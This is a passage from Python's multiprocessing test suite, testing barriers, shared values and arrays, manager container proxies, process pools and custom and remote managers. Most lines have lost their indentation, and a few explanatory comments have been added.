self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
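# Hypothetical illustration (not part of the original test suite): _DummyList is
# an append-only counter shared between processes -- only append() and len() are
# meaningful, backed by a lock-protected shared-memory buffer.
def _dummy_list_example():
    counter = _DummyList()
    counter.append(True)    # the appended value is ignored; only the count matters
    counter.append(True)
    return len(counter)     # 2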
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
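        # Barrier.wait() hands each waiter a distinct index in range(parties),
        # so exactly one of the N collected results should be 0.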
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
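        # All parties should report BrokenBarrierError: the punctual waiters
        # time out after 0.5s, breaking the barrier, and the late thread then
        # finds it already broken.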
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
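        # The lock serialises sends on the shared pipe end so that messages
        # from different worker processes cannot interleave.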
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
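        # Value() with lock=True (the default) or lock=None wraps the ctypes
        # object in a synchronized proxy exposing get_lock()/get_obj();
        # lock=False and RawValue() return the bare ctypes object instead.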
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
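# exception_throwing_generator() yields 0..total-1 but raises SayWhenError
# once it reaches `when` (immediately if when == -1).  The pool tests below
# use it to exercise the error paths of map/imap/imap_unordered.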
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
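# The lambda returned above cannot be pickled, so shipping the result back
# from a worker fails and surfaces as MaybeEncodingError in the parent.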
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
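# QueueManager owns the real queue through the get_queue callable;
# QueueManager2 registers the same name without a callable, so its
# instances can only proxy to an already running server.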
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
        # Note that xmlrpclib will deserialize the tuple as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
